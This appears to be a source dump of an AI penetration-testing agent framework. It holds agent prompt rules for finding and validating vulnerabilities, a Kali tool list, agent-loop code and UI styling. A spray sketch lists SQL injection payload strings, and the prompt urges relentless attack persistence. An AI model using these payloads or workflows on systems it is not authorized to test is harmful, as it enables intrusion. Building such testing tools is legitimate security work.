SIMPLE WORKFLOW RULES:
1. **ALWAYS CREATE AGENTS IN TREES** - Never work alone, always spawn subagents
2. **BLACK-BOX**: Discovery → Validation → Reporting (3 agents per vulnerability)
3. **WHITE-BOX**: Discovery → Validation → Reporting → Fixing (4 agents per vulnerability)
4. **MULTIPLE VULNS = MULTIPLE CHAINS** - Each vulnerability finding gets its own validation chain
5. **CREATE AGENTS AS YOU GO** - Don't create all agents at start, create them when you discover new attack surfaces
6. **ONE JOB PER AGENT** - Each agent has ONE specific task only
WHEN TO CREATE NEW AGENTS:
BLACK-BOX (domain/URL only):
- Found new subdomain? → Create subdomain-specific agent
- Found SQL injection hint? → Create SQL injection agent
- SQL injection agent finds potential vulnerability in login form? → Create "SQLi Validation Agent (Login Form)"
- Validation agent confirms vulnerability? → Create "SQLi Reporting Agent (Login Form)" (NO fixing agent)
WHITE-BOX (source code provided):
- Found authentication code issues? → Create authentication analysis agent
- Auth agent finds potential vulnerability? → Create "Auth Validation Agent"
- Validation agent confirms vulnerability? → Create "Auth Reporting Agent"
- Reporting agent documents vulnerability? → Create "Auth Fixing Agent" (implement code fix and test it works)
VULNERABILITY WORKFLOW (MANDATORY FOR EVERY FINDING):
BLACK-BOX WORKFLOW (domain/URL only):
```
SQL Injection Agent finds vulnerability in login form
Spawns "SQLi Validation Agent (Login Form)" (proves it's real with PoC)
If valid → Spawns "SQLi Reporting Agent (Login Form)" (creates vulnerability report)
STOP - No fixing agents in black-box testing
```
WHITE-BOX WORKFLOW (source code provided):
```
Authentication Code Agent finds weak password validation
Spawns "Auth Validation Agent" (proves it's exploitable)
If valid → Spawns "Auth Reporting Agent" (creates vulnerability report)
Spawns "Auth Fixing Agent" (implements secure code fix)
```
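The two chains above can be sketched as one reactive spawn sequence. This is an illustrative stub only: `spawn_agent` and its return shape are hypothetical stand-ins, not the actual Strix agents-graph tooling.

```python
# Illustrative sketch of the per-finding validation chain described above.
# spawn_agent is a hypothetical stand-in for the real sub-agent tools.
def spawn_agent(name: str, task: str) -> dict:
    # Stub: a real implementation would delegate to the agents-graph tools.
    return {"name": name, "task": task, "valid": True}


def handle_finding(finding: str, white_box: bool) -> list[dict]:
    # Every finding gets its own validation chain.
    chain = [spawn_agent(f"{finding} Validation Agent", task="prove with a PoC")]
    if not chain[-1]["valid"]:
        return chain  # false positive: validation failed, chain stops here
    chain.append(spawn_agent(f"{finding} Reporting Agent", task="write the report"))
    if white_box:
        # Fixing agents exist only in white-box testing.
        chain.append(spawn_agent(f"{finding} Fixing Agent", task="implement and test a fix"))
    return chain
```

A black-box finding therefore yields a two-agent chain (validation, reporting) and a white-box finding a three-agent chain (validation, reporting, fixing), mirroring the workflows above.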
CRITICAL RULES:
- **NO FLAT STRUCTURES** - Always create nested agent trees
- **VALIDATION IS MANDATORY** - Never trust scanner output, always validate with PoCs
- **REALISTIC OUTCOMES** - Some tests find nothing, some validations fail
- **ONE AGENT = ONE TASK** - Don't let agents do multiple unrelated jobs
- **SPAWN REACTIVELY** - Create new agents based on what you discover
- **ONLY REPORTING AGENTS** can use create_vulnerability_report tool
REALISTIC TESTING OUTCOMES:
- **No Findings**: Agent completes testing but finds no vulnerabilities
- **Validation Failed**: Initial finding was false positive, validation agent confirms it's not exploitable
- **Valid Vulnerability**: Validation succeeds, spawns reporting agent and then fixing agent (white-box)
PERSISTENCE IS MANDATORY:
- Real vulnerabilities take TIME - expect to need at least 2000 steps
- NEVER give up early - attackers spend weeks on single targets
- If one approach fails, try 10 more approaches
- Each failure teaches you something - use it to refine next attempts
- Bug bounty hunters spend DAYS on single targets - so should you
- There are ALWAYS more attack vectors to explore
</multi_agent_system>
<tool_usage>
Tool calls use XML format:
<function=tool_name>
<parameter=param_name>value</parameter>
</function>
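For example, a filled-in invocation follows the same shape (the tool and parameter names here are illustrative, not a guaranteed part of the tool set):

```
<function=terminal_execute>
<parameter=command>nmap -sV target.example.com</parameter>
</function>
```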
CRITICAL RULES:
1. One tool call per message
2. Tool call must be last in message
3. End response after </function> tag
4. Thinking is NOT optional - it's required for reasoning and success
SPRAYING EXECUTION NOTE:
- When performing large payload sprays or fuzzing, encapsulate the entire spraying loop inside a single python or terminal tool call (e.g., a Python script using asyncio/aiohttp). Do not issue one tool call per payload.
- Favor batch-mode CLI tools (sqlmap, ffuf, nuclei, zaproxy, arjun) where appropriate and check traffic via the proxy when beneficial
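A spray batched into a single tool call can be sketched as below. `send_payload` is a stub standing in for the real HTTP round trip; an actual spray would use aiohttp against the target (through the proxy), but the batching pattern - one `asyncio.gather` over all payloads, bounded by a semaphore - is the point.

```python
import asyncio

# Hypothetical payload list; a real spray would load these from a wordlist.
PAYLOADS = ["' OR 1=1--", '" OR "1"="1', "admin'--"]


async def send_payload(payload: str) -> tuple[str, int]:
    await asyncio.sleep(0)  # stand-in for the HTTP round trip
    return payload, 200


async def spray(payloads: list[str], concurrency: int = 10) -> list[tuple[str, int]]:
    sem = asyncio.Semaphore(concurrency)  # bound in-flight requests

    async def bounded(p: str) -> tuple[str, int]:
        async with sem:
            return await send_payload(p)

    # The whole loop lives inside one coroutine, so the agent issues
    # exactly one tool call for the entire spray.
    return await asyncio.gather(*(bounded(p) for p in payloads))


results = asyncio.run(spray(PAYLOADS))
```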
{{ get_tools_prompt() }}
</tool_usage>
<environment>
Docker container with Kali Linux and comprehensive security tools:
RECONNAISSANCE & SCANNING:
- nmap, ncat, ndiff - Network mapping and port scanning
- subfinder - Subdomain enumeration
- naabu - Fast port scanner
- httpx - HTTP probing and validation
- gospider - Web spider/crawler
VULNERABILITY ASSESSMENT:
- nuclei - Vulnerability scanner with templates
- sqlmap - SQL injection detection/exploitation
- trivy - Container/dependency vulnerability scanner
- zaproxy - OWASP ZAP web app scanner
- wapiti - Web vulnerability scanner
WEB FUZZING & DISCOVERY:
- ffuf - Fast web fuzzer
- dirsearch - Directory/file discovery
- katana - Advanced web crawler
- arjun - HTTP parameter discovery
- vulnx (cvemap) - CVE vulnerability mapping
JAVASCRIPT ANALYSIS:
- JS-Snooper, jsniper.sh - JS analysis scripts
- retire - Vulnerable JS library detection
- eslint, jshint - JS static analysis
- js-beautify - JS beautifier/deobfuscator
CODE ANALYSIS:
- semgrep - Static analysis/SAST
- bandit - Python security linter
- trufflehog - Secret detection in code
SPECIALIZED TOOLS:
- jwt_tool - JWT token manipulation
- wafw00f - WAF detection
- interactsh-client - OOB interaction testing
PROXY & INTERCEPTION:
- Caido CLI - Modern web proxy (already running). Use it via the proxy tool or the python tool (helper functions are already imported).
- NOTE: Proxy errors when sending requests usually mean you are not targeting the correct URL/host/port.
PROGRAMMING:
- Python 3, Poetry, Go, Node.js/npm
- Full development environment
- Docker is NOT available inside the sandbox. Do not run docker; rely on provided tools to run locally.
- You can install any additional tools/packages needed based on the task/context using package managers (apt, pip, npm, go install, etc.)
Directories:
- /workspace - Your private agent directory
- /shared_workspace - Shared between agents
- /home/pentester/tools - Additional tool scripts
- /home/pentester/tools/wordlists - Currently empty; download wordlists here as needed.
Default user: pentester (sudo available)
</environment>
{% if loaded_module_names %}
<specialized_knowledge>
{# Dynamic prompt modules loaded based on agent specialization #}
{% for module_name in loaded_module_names %}
{{ get_module(module_name) }}
{% endfor %}
</specialized_knowledge>
{% endif %}

10
strix/agents/__init__.py Normal file

@@ -0,0 +1,10 @@
from .base_agent import BaseAgent
from .state import AgentState
from .StrixAgent import StrixAgent
__all__ = [
"AgentState",
"BaseAgent",
"StrixAgent",
]

394
strix/agents/base_agent.py Normal file

@@ -0,0 +1,394 @@
import asyncio
import logging
from pathlib import Path
from typing import TYPE_CHECKING, Any, Optional
if TYPE_CHECKING:
from strix.cli.tracer import Tracer
from jinja2 import (
Environment,
FileSystemLoader,
select_autoescape,
)
from strix.llm import LLM, LLMConfig
from strix.llm.utils import clean_content
from strix.tools import process_tool_invocations
from .state import AgentState
logger = logging.getLogger(__name__)
class AgentMeta(type):
agent_name: str
jinja_env: Environment
def __new__(cls, name: str, bases: tuple[type, ...], attrs: dict[str, Any]) -> type:
new_cls = super().__new__(cls, name, bases, attrs)
if name == "BaseAgent":
return new_cls
agents_dir = Path(__file__).parent
prompt_dir = agents_dir / name
new_cls.agent_name = name
new_cls.jinja_env = Environment(
loader=FileSystemLoader(prompt_dir),
autoescape=select_autoescape(enabled_extensions=(), default_for_string=False),
)
return new_cls
class BaseAgent(metaclass=AgentMeta):
max_iterations = 200
agent_name: str = ""
jinja_env: Environment
default_llm_config: LLMConfig | None = None
def __init__(self, config: dict[str, Any]):
self.config = config
self.local_source_path = config.get("local_source_path")
if "max_iterations" in config:
self.max_iterations = config["max_iterations"]
self.llm_config_name = config.get("llm_config_name", "default")
self.llm_config = config.get("llm_config", self.default_llm_config)
if self.llm_config is None:
raise ValueError("llm_config is required but not provided")
self.llm = LLM(self.llm_config, agent_name=self.agent_name)
state_from_config = config.get("state")
if state_from_config is not None:
self.state = state_from_config
else:
self.state = AgentState(
agent_name=self.agent_name,
max_iterations=self.max_iterations,
)
self._current_task: asyncio.Task[Any] | None = None
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.log_agent_creation(
agent_id=self.state.agent_id,
name=self.state.agent_name,
task=self.state.task,
parent_id=self.state.parent_id,
)
if self.state.parent_id is None:
scan_config = tracer.scan_config or {}
exec_id = tracer.log_tool_execution_start(
agent_id=self.state.agent_id,
tool_name="scan_start_info",
args=scan_config,
)
tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
else:
exec_id = tracer.log_tool_execution_start(
agent_id=self.state.agent_id,
tool_name="subagent_start_info",
args={
"name": self.state.agent_name,
"task": self.state.task,
"parent_id": self.state.parent_id,
},
)
tracer.update_tool_execution(execution_id=exec_id, status="completed", result={})
self._add_to_agents_graph()
def _add_to_agents_graph(self) -> None:
from strix.tools.agents_graph import agents_graph_actions
node = {
"id": self.state.agent_id,
"name": self.state.agent_name,
"task": self.state.task,
"status": "running",
"parent_id": self.state.parent_id,
"created_at": self.state.start_time,
"finished_at": None,
"result": None,
"llm_config": self.llm_config_name,
"agent_type": self.__class__.__name__,
"state": self.state.model_dump(),
}
agents_graph_actions._agent_graph["nodes"][self.state.agent_id] = node
agents_graph_actions._agent_instances[self.state.agent_id] = self
agents_graph_actions._agent_states[self.state.agent_id] = self.state
if self.state.parent_id:
agents_graph_actions._agent_graph["edges"].append(
{"from": self.state.parent_id, "to": self.state.agent_id, "type": "delegation"}
)
if self.state.agent_id not in agents_graph_actions._agent_messages:
agents_graph_actions._agent_messages[self.state.agent_id] = []
if self.state.parent_id is None and agents_graph_actions._root_agent_id is None:
agents_graph_actions._root_agent_id = self.state.agent_id
def cancel_current_execution(self) -> None:
if self._current_task and not self._current_task.done():
self._current_task.cancel()
self._current_task = None
async def agent_loop(self, task: str) -> dict[str, Any]:
await self._initialize_sandbox_and_state(task)
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
while True:
self._check_agent_messages(self.state)
if self.state.is_waiting_for_input():
await self._wait_for_input()
continue
if self.state.should_stop():
await self._enter_waiting_state(tracer)
continue
self.state.increment_iteration()
try:
should_finish = await self._process_iteration(tracer)
if should_finish:
await self._enter_waiting_state(tracer, task_completed=True)
continue
except asyncio.CancelledError:
await self._enter_waiting_state(tracer, error_occurred=False, was_cancelled=True)
continue
except (RuntimeError, ValueError, TypeError) as e:
if not await self._handle_iteration_error(e, tracer):
await self._enter_waiting_state(tracer, error_occurred=True)
continue
async def _wait_for_input(self) -> None:
await asyncio.sleep(0.5)
async def _enter_waiting_state(
self,
tracer: Optional["Tracer"],
task_completed: bool = False,
error_occurred: bool = False,
was_cancelled: bool = False,
) -> None:
self.state.enter_waiting_state()
if tracer:
if task_completed:
tracer.update_agent_status(self.state.agent_id, "completed")
elif error_occurred:
tracer.update_agent_status(self.state.agent_id, "error")
elif was_cancelled:
tracer.update_agent_status(self.state.agent_id, "stopped")
else:
tracer.update_agent_status(self.state.agent_id, "stopped")
if task_completed:
self.state.add_message(
"assistant",
"Task completed. I'm now waiting for follow-up instructions or new tasks.",
)
elif error_occurred:
self.state.add_message(
"assistant", "An error occurred. I'm now waiting for new instructions."
)
elif was_cancelled:
self.state.add_message(
"assistant", "Execution was cancelled. I'm now waiting for new instructions."
)
else:
self.state.add_message(
"assistant",
"Execution paused. I'm now waiting for new instructions or any updates.",
)
async def _initialize_sandbox_and_state(self, task: str) -> None:
import os
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode and self.state.sandbox_id is None:
from strix.runtime import get_runtime
runtime = get_runtime()
sandbox_info = await runtime.create_sandbox(
self.state.agent_id, self.state.sandbox_token, self.local_source_path
)
self.state.sandbox_id = sandbox_info["workspace_id"]
self.state.sandbox_token = sandbox_info["auth_token"]
self.state.sandbox_info = sandbox_info
if not self.state.task:
self.state.task = task
self.state.add_message("user", task)
async def _process_iteration(self, tracer: Optional["Tracer"]) -> bool:
response = await self.llm.generate(self.state.get_conversation_history())
content_stripped = (response.content or "").strip()
if not content_stripped:
corrective_message = (
"You MUST NOT respond with empty messages. "
"If you currently have nothing to do or say, use an appropriate tool instead:\n"
"- Use agents_graph_actions.wait_for_message to wait for messages "
"from user or other agents\n"
"- Use agents_graph_actions.agent_finish if you are a sub-agent "
"and your task is complete\n"
"- Use finish_actions.finish_scan if you are the root/main agent "
"and the scan is complete"
)
self.state.add_message("user", corrective_message)
return False
self.state.add_message("assistant", response.content)
if tracer:
tracer.log_chat_message(
content=clean_content(response.content),
role="assistant",
agent_id=self.state.agent_id,
)
actions = (
response.tool_invocations
if hasattr(response, "tool_invocations") and response.tool_invocations
else []
)
if actions:
return await self._execute_actions(actions, tracer)
return False
async def _execute_actions(self, actions: list[Any], tracer: Optional["Tracer"]) -> bool:
"""Execute actions and return True if agent should finish."""
for action in actions:
self.state.add_action(action)
conversation_history = self.state.get_conversation_history()
tool_task = asyncio.create_task(
process_tool_invocations(actions, conversation_history, self.state)
)
self._current_task = tool_task
try:
should_agent_finish = await tool_task
self._current_task = None
except asyncio.CancelledError:
self._current_task = None
self.state.add_error("Tool execution cancelled by user")
raise
self.state.messages = conversation_history
if should_agent_finish:
self.state.set_completed({"success": True})
if tracer:
tracer.update_agent_status(self.state.agent_id, "completed")
return True
return False
async def _handle_iteration_error(
self,
error: RuntimeError | ValueError | TypeError | asyncio.CancelledError,
tracer: Optional["Tracer"],
) -> bool:
error_msg = f"Error in iteration {self.state.iteration}: {error!s}"
logger.exception(error_msg)
self.state.add_error(error_msg)
if tracer:
tracer.update_agent_status(self.state.agent_id, "error")
return True
def _check_agent_messages(self, state: AgentState) -> None:
try:
from strix.tools.agents_graph.agents_graph_actions import _agent_graph, _agent_messages
agent_id = state.agent_id
if not agent_id or agent_id not in _agent_messages:
return
messages = _agent_messages[agent_id]
if messages:
has_new_messages = False
for message in messages:
if not message.get("read", False):
if state.is_waiting_for_input():
state.resume_from_waiting()
has_new_messages = True
sender_name = "Unknown Agent"
sender_id = message.get("from")
if sender_id == "user":
sender_name = "User"
state.add_message("user", message.get("content", ""))
else:
if sender_id and sender_id in _agent_graph.get("nodes", {}):
sender_name = _agent_graph["nodes"][sender_id]["name"]
message_content = f"""<inter_agent_message>
<delivery_notice>
<important>You have received a message from another agent. You should acknowledge
this message and respond appropriately based on its content. However, DO NOT echo
back or repeat the entire message structure in your response. Simply process the
content and respond naturally as/if needed.</important>
</delivery_notice>
<sender>
<agent_name>{sender_name}</agent_name>
<agent_id>{sender_id}</agent_id>
</sender>
<message_metadata>
<type>{message.get("message_type", "information")}</type>
<priority>{message.get("priority", "normal")}</priority>
<timestamp>{message.get("timestamp", "")}</timestamp>
</message_metadata>
<content>
{message.get("content", "")}
</content>
<delivery_info>
<note>This message was delivered during your task execution.
Please acknowledge and respond if needed.</note>
</delivery_info>
</inter_agent_message>"""
state.add_message("user", message_content.strip())
message["read"] = True
if has_new_messages and not state.is_waiting_for_input():
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer:
tracer.update_agent_status(agent_id, "running")
except (AttributeError, KeyError, TypeError) as e:
logger.warning(f"Error checking agent messages: {e}")

139
strix/agents/state.py Normal file

@@ -0,0 +1,139 @@
import uuid
from datetime import UTC, datetime
from typing import Any
from pydantic import BaseModel, Field
def _generate_agent_id() -> str:
return f"agent_{uuid.uuid4().hex[:8]}"
class AgentState(BaseModel):
agent_id: str = Field(default_factory=_generate_agent_id)
agent_name: str = "Strix Agent"
parent_id: str | None = None
sandbox_id: str | None = None
sandbox_token: str | None = None
sandbox_info: dict[str, Any] | None = None
task: str = ""
iteration: int = 0
max_iterations: int = 200
completed: bool = False
stop_requested: bool = False
waiting_for_input: bool = False
final_result: dict[str, Any] | None = None
messages: list[dict[str, Any]] = Field(default_factory=list)
context: dict[str, Any] = Field(default_factory=dict)
start_time: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
last_updated: str = Field(default_factory=lambda: datetime.now(UTC).isoformat())
actions_taken: list[dict[str, Any]] = Field(default_factory=list)
observations: list[dict[str, Any]] = Field(default_factory=list)
errors: list[str] = Field(default_factory=list)
def increment_iteration(self) -> None:
self.iteration += 1
self.last_updated = datetime.now(UTC).isoformat()
def add_message(self, role: str, content: Any) -> None:
self.messages.append({"role": role, "content": content})
self.last_updated = datetime.now(UTC).isoformat()
def add_action(self, action: dict[str, Any]) -> None:
self.actions_taken.append(
{
"iteration": self.iteration,
"timestamp": datetime.now(UTC).isoformat(),
"action": action,
}
)
def add_observation(self, observation: dict[str, Any]) -> None:
self.observations.append(
{
"iteration": self.iteration,
"timestamp": datetime.now(UTC).isoformat(),
"observation": observation,
}
)
def add_error(self, error: str) -> None:
self.errors.append(f"Iteration {self.iteration}: {error}")
self.last_updated = datetime.now(UTC).isoformat()
def update_context(self, key: str, value: Any) -> None:
self.context[key] = value
self.last_updated = datetime.now(UTC).isoformat()
def set_completed(self, final_result: dict[str, Any] | None = None) -> None:
self.completed = True
self.final_result = final_result
self.last_updated = datetime.now(UTC).isoformat()
def request_stop(self) -> None:
self.stop_requested = True
self.last_updated = datetime.now(UTC).isoformat()
def should_stop(self) -> bool:
return self.stop_requested or self.completed or self.has_reached_max_iterations()
def is_waiting_for_input(self) -> bool:
return self.waiting_for_input
def enter_waiting_state(self) -> None:
self.waiting_for_input = True
self.stop_requested = False
self.last_updated = datetime.now(UTC).isoformat()
def resume_from_waiting(self, new_task: str | None = None) -> None:
self.waiting_for_input = False
self.stop_requested = False
self.completed = False
if new_task:
self.task = new_task
self.last_updated = datetime.now(UTC).isoformat()
def has_reached_max_iterations(self) -> bool:
return self.iteration >= self.max_iterations
def has_empty_last_messages(self, count: int = 3) -> bool:
if len(self.messages) < count:
return False
last_messages = self.messages[-count:]
for message in last_messages:
content = message.get("content", "")
if isinstance(content, str) and content.strip():
return False
return True
def get_conversation_history(self) -> list[dict[str, Any]]:
return self.messages
def get_execution_summary(self) -> dict[str, Any]:
return {
"agent_id": self.agent_id,
"agent_name": self.agent_name,
"parent_id": self.parent_id,
"sandbox_id": self.sandbox_id,
"sandbox_info": self.sandbox_info,
"task": self.task,
"iteration": self.iteration,
"max_iterations": self.max_iterations,
"completed": self.completed,
"final_result": self.final_result,
"start_time": self.start_time,
"last_updated": self.last_updated,
"total_actions": len(self.actions_taken),
"total_observations": len(self.observations),
"total_errors": len(self.errors),
"has_errors": len(self.errors) > 0,
"max_iterations_reached": self.has_reached_max_iterations() and not self.completed,
}

4
strix/cli/__init__.py Normal file

@@ -0,0 +1,4 @@
from .main import main
__all__ = ["main"]

1122
strix/cli/app.py Normal file

File diff suppressed because it is too large

680
strix/cli/assets/cli.tcss Normal file

@@ -0,0 +1,680 @@
Screen {
background: #1a1a1a;
color: #d4d4d4;
}
#splash_screen {
height: 100%;
width: 100%;
background: #1a1a1a;
color: #22c55e;
content-align: center middle;
text-align: center;
}
#splash_content {
width: auto;
height: auto;
background: transparent;
text-align: center;
padding: 2;
}
#main_container {
height: 100%;
padding: 0;
margin: 0;
background: #1a1a1a;
}
#content_container {
height: 1fr;
padding: 0;
background: transparent;
}
#agents_tree {
width: 20%;
background: transparent;
border: round #262626;
border-title-color: #a8a29e;
border-title-style: bold;
margin-left: 1;
padding: 1;
}
#chat_area_container {
width: 80%;
background: transparent;
}
#chat_history {
height: 1fr;
background: transparent;
border: round #1a1a1a;
padding: 0;
margin-bottom: 0;
margin-right: 0;
scrollbar-background: #0f0f0f;
scrollbar-color: #262626;
scrollbar-corner-color: #0f0f0f;
scrollbar-size: 1 1;
}
#agent_status_display {
height: 1;
background: transparent;
margin: 0;
padding: 0 1;
}
#agent_status_display.hidden {
display: none;
}
#status_text {
width: 1fr;
height: 100%;
background: transparent;
color: #a3a3a3;
text-align: left;
content-align: left middle;
text-style: italic;
margin: 0;
padding: 0;
}
#keymap_indicator {
width: auto;
height: 100%;
background: transparent;
color: #737373;
text-align: right;
content-align: right middle;
text-style: none;
margin: 0;
padding: 0;
}
#chat_input_container {
height: 3;
background: transparent;
border: round #525252;
margin-right: 0;
padding: 0;
layout: horizontal;
align-vertical: middle;
}
#chat_input_container:focus-within {
border: round #22c55e;
}
#chat_input_container:focus-within #chat_prompt {
color: #22c55e;
text-style: bold;
}
#chat_prompt {
width: auto;
height: 100%;
padding: 0 0 0 1;
color: #737373;
content-align-vertical: middle;
}
#chat_history:focus {
border: round #22c55e;
}
#chat_input {
width: 1fr;
height: 100%;
background: #121212;
border: none;
color: #d4d4d4;
padding: 0;
margin: 0;
}
#chat_input:focus {
border: none;
}
#chat_input > .text-area--placeholder {
color: #525252;
text-style: italic;
}
#chat_input > .text-area--cursor {
color: #22c55e;
background: #22c55e;
}
.chat-placeholder {
width: 100%;
height: 100%;
content-align: center middle;
text-align: center;
color: #737373;
text-style: italic;
}
.chat-content {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
padding: 0 1;
background: transparent;
width: 100%;
}
.chat-message {
margin-bottom: 0;
padding: 0;
background: transparent;
width: 100%;
}
.user-message {
color: #e5e5e5;
border-left: thick #3b82f6;
padding-left: 1;
margin-bottom: 1;
}
.tool-call {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
padding: 0 1;
background: #0a0a0a;
border: round #1a1a1a;
border-left: thick #f59e0b;
width: 100%;
}
.tool-call.status-completed {
border-left: thick #22c55e;
background: #0d1f12;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.tool-call.status-running {
border-left: thick #f59e0b;
background: #1f1611;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.tool-call.status-failed,
.tool-call.status-error {
border-left: thick #ef4444;
background: #1f0d0d;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool,
.terminal-tool,
.python-tool,
.agents-graph-tool,
.file-edit-tool,
.proxy-tool,
.notes-tool,
.thinking-tool,
.web-search-tool,
.finish-tool,
.reporting-tool,
.scan-info-tool,
.subagent-info-tool {
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool {
border-left: thick #06b6d4;
}
.browser-tool.status-completed {
border-left: thick #06b6d4;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.browser-tool.status-running {
border-left: thick #0891b2;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.terminal-tool {
border-left: thick #22c55e;
}
.terminal-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.terminal-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.python-tool {
border-left: thick #3b82f6;
}
.python-tool.status-completed {
border-left: thick #3b82f6;
background: transparent;
}
.python-tool.status-running {
border-left: thick #2563eb;
background: transparent;
}
.agents-graph-tool {
border-left: thick #fbbf24;
}
.agents-graph-tool.status-completed {
border-left: thick #fbbf24;
background: transparent;
}
.agents-graph-tool.status-running {
border-left: thick #f59e0b;
background: transparent;
}
.file-edit-tool {
border-left: thick #10b981;
}
.file-edit-tool.status-completed {
border-left: thick #10b981;
background: transparent;
}
.file-edit-tool.status-running {
border-left: thick #059669;
background: transparent;
}
.proxy-tool {
border-left: thick #06b6d4;
}
.proxy-tool.status-completed {
border-left: thick #06b6d4;
background: transparent;
}
.proxy-tool.status-running {
border-left: thick #0891b2;
background: transparent;
}
.notes-tool {
border-left: thick #fbbf24;
}
.notes-tool.status-completed {
border-left: thick #fbbf24;
background: transparent;
}
.notes-tool.status-running {
border-left: thick #f59e0b;
background: transparent;
}
.thinking-tool {
border-left: thick #a855f7;
}
.thinking-tool.status-completed {
border-left: thick #a855f7;
background: transparent;
}
.thinking-tool.status-running {
border-left: thick #9333ea;
background: transparent;
}
.web-search-tool {
border-left: thick #22c55e;
}
.web-search-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.web-search-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.finish-tool {
border-left: thick #dc2626;
}
.finish-tool.status-completed {
border-left: thick #dc2626;
background: transparent;
}
.finish-tool.status-running {
border-left: thick #b91c1c;
background: transparent;
}
.reporting-tool {
border-left: thick #ea580c;
}
.reporting-tool.status-completed {
border-left: thick #ea580c;
background: transparent;
}
.reporting-tool.status-running {
border-left: thick #c2410c;
background: transparent;
}
.scan-info-tool {
border-left: thick #22c55e;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.scan-info-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.scan-info-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
.subagent-info-tool {
border-left: thick #22c55e;
background: transparent;
margin: 0 !important;
margin-top: 0 !important;
margin-bottom: 0 !important;
}
.subagent-info-tool.status-completed {
border-left: thick #22c55e;
background: transparent;
}
.subagent-info-tool.status-running {
border-left: thick #16a34a;
background: transparent;
}
Tree {
background: transparent;
color: #e7e5e4;
scrollbar-background: transparent;
scrollbar-color: #404040;
scrollbar-corner-color: transparent;
scrollbar-size: 1 1;
}
Tree > .tree--label {
text-style: bold;
color: #a8a29e;
background: transparent;
padding: 0 1;
margin-bottom: 1;
border-bottom: solid #262626;
text-align: center;
}
.tree--node {
height: 1;
padding: 0;
margin: 0;
}
.tree--node-label {
color: #d6d3d1;
background: transparent;
text-style: none;
padding: 0 1;
margin: 0 1;
}
.tree--node:hover .tree--node-label {
background: transparent;
color: #fafaf9;
text-style: bold;
border-left: solid #a8a29e;
}
.tree--node.-selected .tree--node-label {
background: transparent;
color: #fafaf9;
text-style: bold;
border-left: heavy #d6d3d1;
}
.tree--node.-expanded .tree--node-label {
text-style: bold;
color: #fafaf9;
background: transparent;
border-left: solid #78716c;
}
Tree:focus {
border: round #262626;
}
Tree:focus > .tree--label {
color: #fafaf9;
text-style: bold;
background: transparent;
}
.tree--node .tree--node .tree--node-label {
color: #a8a29e;
padding-left: 2;
border: none;
background: transparent;
margin-left: 1;
}
.tree--node .tree--node:hover .tree--node-label {
background: transparent;
color: #e7e5e4;
}
.tree--node .tree--node .tree--node .tree--node-label {
color: #78716c;
padding-left: 3;
text-style: none;
border: none;
background: transparent;
margin-left: 2;
}
StopAgentScreen {
align: center middle;
background: $background 0%;
}
#stop_agent_dialog {
grid-size: 1;
grid-gutter: 1;
grid-rows: auto auto;
padding: 1;
width: 30;
height: auto;
border: round #a3a3a3;
background: #1a1a1a 98%;
}
#stop_agent_title {
color: #a3a3a3;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 0;
}
#stop_agent_buttons {
grid-size: 2;
grid-gutter: 1;
grid-columns: 1fr 1fr;
width: 100%;
height: 1;
}
#stop_agent_buttons Button {
height: 1;
min-height: 1;
border: none;
text-style: bold;
}
#stop_agent {
background: transparent;
color: #ef4444;
border: none;
}
#stop_agent:hover, #stop_agent:focus {
background: #ef4444;
color: #ffffff;
border: none;
}
#cancel_stop {
background: transparent;
color: #737373;
border: none;
}
#cancel_stop:hover, #cancel_stop:focus {
background: rgb(54, 54, 54);
color: #ffffff;
border: none;
}
QuitScreen {
align: center middle;
background: $background 0%;
}
#quit_dialog {
grid-size: 1;
grid-gutter: 1;
grid-rows: auto auto;
padding: 1;
width: 24;
height: auto;
border: round #525252;
background: #1a1a1a 98%;
}
#quit_title {
color: #d4d4d4;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 0;
}
#quit_buttons {
grid-size: 2;
grid-gutter: 1;
grid-columns: 1fr 1fr;
width: 100%;
height: 1;
}
#quit_buttons Button {
height: 1;
min-height: 1;
border: none;
text-style: bold;
}
#quit {
background: transparent;
color: #ef4444;
border: none;
}
#quit:hover, #quit:focus {
background: #ef4444;
color: #ffffff;
border: none;
}
#cancel {
background: transparent;
color: #737373;
border: none;
}
#cancel:hover, #cancel:focus {
background: rgb(54, 54, 54);
color: #ffffff;
border: none;
}
HelpScreen {
align: center middle;
background: $background 0%;
}
#dialog {
grid-size: 1;
grid-gutter: 0 1;
grid-rows: auto auto;
padding: 1 2;
width: 40;
height: auto;
border: round #22c55e;
background: #1a1a1a 98%;
}
#help_title {
color: #22c55e;
text-style: bold;
text-align: center;
width: 100%;
margin-bottom: 1;
}
#help_content {
color: #d4d4d4;
text-align: left;
width: 100%;
margin-bottom: 1;
padding: 0;
background: transparent;
text-style: none;
}

542
strix/cli/main.py Normal file

@@ -0,0 +1,542 @@
#!/usr/bin/env python3
"""
Strix Agent Command Line Interface
"""
import argparse
import asyncio
import logging
import os
import secrets
import sys
from pathlib import Path
from typing import Any
from urllib.parse import urlparse
import docker
import litellm
from docker.errors import DockerException
from rich.console import Console
from rich.panel import Panel
from rich.text import Text
from strix.cli.app import run_strix_cli
from strix.cli.tracer import get_global_tracer
from strix.runtime.docker_runtime import STRIX_IMAGE
